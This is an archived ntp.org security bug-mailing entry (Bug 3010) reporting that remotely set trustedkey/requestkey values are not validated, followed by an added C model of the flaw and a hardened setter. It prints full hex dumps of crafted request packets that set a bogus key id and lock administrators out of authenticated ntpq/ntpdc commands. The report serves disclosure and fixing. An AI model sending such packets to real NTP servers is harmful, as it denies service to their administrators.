[ntp:security] [Bug 3010] remote configuration trustedkey/requestkey values are not properly validated

bugzilla-daemon at ntp.org bugzilla-daemon at ntp.org
Wed Feb 3 07:33:38 UTC 2016


http://bugs.ntp.org/show_bug.cgi?id=3010

Harlan Stenn <stenn at ntp.org> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
              Group|                            |Security
                 CC|                            |LRlian at 163.com
            Summary|x                           |remote configuration
                   |                            |trustedkey/requestkey
                   |                            |values are not properly
                   |                            |validated
              Flags|                            |blocking4.2.8+

--- Comment #1 from Harlan Stenn <stenn at ntp.org> 2016-02-03 07:33:38 UTC ---
Command “ntpdc -c trustedkey AAAA” can’t be used now, but I can use these
packets to simulate it.

Set_control_keyid: // command is: ntpdc -c trustedkey …
17 80 03 21 00 01 00 08 41 41 41 41 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 DA 2B 86 11 09 1E B8 52
00 00 00 08 71 AA 5D 1B 92 C6 C9 D8 CB 76 5D CB
F8 D2 87 D9
(These red bits are a wrong MD5 of the other bits; for the decryption to
succeed, you need to calculate it yourself.)

Set_request_keyid: // command is: ntpdc -c requestkey ….
17 80 03 20 00 01 00 08 41 41 41 41 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 DA 2B 62 43 5D 1E B8 52
00 00 00 08 FB D2 B8 32 EF 89 37 21 73 F2 20 B4
94 82 95 59

After I sent these packets, the global variable info_auth_keyid or
ctl_auth_keyid will be assigned “41 41 41 41”:

Ntp_request.c:

2268:  info_auth_keyid = ntohl(*pkeyid);
…
2296:  ctl_auth_keyid = ntohl(*pkeyid);

· Because key “41 41 41 41” isn’t a valid key and does not exist in ntp.keys,
all the trusted ntpd administrators couldn’t use all of the ntpdc and ntpq
commands which need authentication, even though they have the real key and
password, until the ntpd.service is restarted.

Here are the details:

Authentication function:

Ntp_control.c:
Line_1158: !res_authokay || res_keyid != ctl_auth_keyid
Authkeys.c:
Line_690:  if (0 == keyno || !authhavekey(keyno) || size < 4)
                     …
Ntp_request.c:
Line 586:  ntohl(tailinpkt->keyid) != info_auth_keyid

· Here is the test screenshot:

Before I sent the attack packet, addpeer through ntpq commands succeeded.
But addpeer failed after I sent the attack packet.

[cid:image003.jpg at 01D14C66.562D2770]

And it’s the same for ntpdc commands.

[cid:image004.png at 01D14C63.5CD17840]

And perhaps this problem is not serious because of the password protector. But
it’s a security issue after all.

-- 
Configure bugmail: http://bugs.ntp.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are on the CC list for the bug.
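
The missing check this report describes, as an added example that is not part of the original message or of the ntpd source: a self-contained C model showing the unchecked assignment beside a setter that rejects key ids with no key material. The key table, `have_key` (standing in for `authhavekey`), the setter and gate function names, and the starting key id 8 are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdio.h>

/* Constructed stand-in for the keys loaded from ntp.keys (ids 1 and 8). */
static const uint32_t known_keys[] = { 1, 8 };

/* Assumed stand-in for the authhavekey() lookup named in the report. */
static int have_key(uint32_t id) {
    for (unsigned i = 0; i < sizeof known_keys / sizeof known_keys[0]; i++)
        if (known_keys[i] == id) return 1;
    return 0;
}

/* Model of the global from the report; 8 is a constructed starting value. */
static uint32_t info_auth_keyid = 8;

/* Decode the 32-bit network-order key id carried in the request data. */
static uint32_t get_be32(const unsigned char *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Behaviour the report describes: the received value is stored as-is. */
static void set_request_key_unchecked(const unsigned char *data) {
    info_auth_keyid = get_be32(data);
}

/* Hardened form: reject 0 and ids with no key material, keep the old id. */
static int set_request_key_checked(const unsigned char *data) {
    uint32_t id = get_be32(data);
    if (id == 0 || !have_key(id)) return -1;
    info_auth_keyid = id;
    return 0;
}

/* Gate modelled on the checks quoted in the report: the packet's key id
 * must equal the configured id and the key must exist. */
static int admin_request_accepted(uint32_t pkt_keyid) {
    return pkt_keyid == info_auth_keyid && have_key(pkt_keyid);
}

int main(void) {
    const unsigned char bogus[4] = { 0x41, 0x41, 0x41, 0x41 };
    set_request_key_unchecked(bogus);
    printf("unchecked: admin with key 8 accepted = %d\n", admin_request_accepted(8));
    info_auth_keyid = 8;
    printf("checked: setter returned %d, ", set_request_key_checked(bogus));
    printf("admin with key 8 accepted = %d\n", admin_request_accepted(8));
    return 0;
}
```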
